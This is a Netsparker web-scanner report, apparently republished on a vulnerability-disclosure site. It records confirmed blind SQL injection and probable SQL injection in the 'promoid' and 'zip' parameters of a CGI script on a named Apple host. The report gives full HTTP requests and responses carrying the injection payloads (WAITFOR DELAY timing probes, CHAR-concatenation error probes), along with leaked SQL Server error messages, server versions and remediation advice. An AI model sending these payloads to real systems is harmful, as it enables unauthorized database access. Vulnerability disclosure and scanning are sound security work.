Blind SQL Injection, CWE-89, CAPEC-66, wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading
Netsparker - Scan Report Summary
TARGET URL
 http://wsidecar.apple.com/cgi-bin/upgrade_que...
SCAN DATE
 9/27/2011 8:37:55 PM
REPORT DATE
 10/3/2011 8:47:47 PM
SCAN DURATION
 00:31:54

Total Requests

Average Speed

req/sec.
11
identified
3
confirmed
6
critical
2
informational

SCAN SETTINGS

Scan Settings
PROFILE
 Previous Settings
ENABLED ENGINES
 Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
CRITICAL
55 %
LOW
27 %
INFORMATION
18 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/cgi-bin/upgrade_query/query.pl promoid POST Blind SQL Injection Yes
promoid POST Blind SQL Injection Yes
promoid POST [Probable] SQL Injection No
promoid POST [Probable] SQL Injection No
zip POST [Probable] SQL Injection No
zip POST [Probable] SQL Injection No
Apache Version Disclosure No
PHP Version Disclosure No
promoid POST Database Error Message No
Microsoft SQL Server Identified Yes
Apache Version Is Out Of Date No
Blind SQL Injection

Blind SQL Injection
2 TOTAL
CRITICAL
CONFIRMED
2
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl CONFIRMED

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
promoid POST ';WAITFOR DELAY '0:0:25'--
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 3
email POST netsparker@example.com
submit POST   Check Status  

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 166
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid=%27;WAITFOR%20DELAY%20%270:0:25%27--&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:46 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4126
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%3BWAITFOR%20DELAY%20%270%3A0%3A25%27%2D%2D&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL">
<table width="430" border="0">

<tr>
<td width=400><font color=red><b>No records matched your search criteria.</b></font></td>
</tr>

</table>
<BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl CONFIRMED

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
promoid POST ';WAITFOR DELAY '0:0:25'--
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 3
email POST netsparker@example.com

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 122
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid=%27;WAITFOR%20DELAY%20%270:0:25%27--&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:38:27 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4126
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1728


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%3BWAITFOR%20DELAY%20%270%3A0%3A25%27%2D%2D&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL">
<table width="430" border="0">

<tr>
<td width=400><font color=red><b>No records matched your search criteria.</b></font></td>
</tr>

</table>
<BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
[Probable] SQL Injection

[Probable] SQL Injection
4 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

Classification

OWASP A1 PCI v1.2-6.5.2 PCI v2.0-6.5.1 CWE-89 CAPEC-66 WASC-19
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
promoid POST '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 3
email POST netsparker@example.com
submit POST   Check Status  

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 306
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:38:02 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4457
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%2B%20%28select%20convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%20FROM%20syscolumns%29%20%2B%27&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Line 1: Incorrect syntax near '+'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
promoid POST '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 3
email POST netsparker@example.com

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 262
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid='%2B%20(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)%20%2B'&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:40:23 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4457
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1818


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=%27%2B%20%28select%20convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%20FROM%20syscolumns%29%20%2B%27&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Line 1: Incorrect syntax near '+'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'
email POST netsparker@example.com

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 215
Expect: 100-continue
Accept-Encoding: gzip, deflate

company=3&firstname=Smith&lastname=Smith&zip='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&email=netsparker%40example.com

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:53:16 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4223
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1726


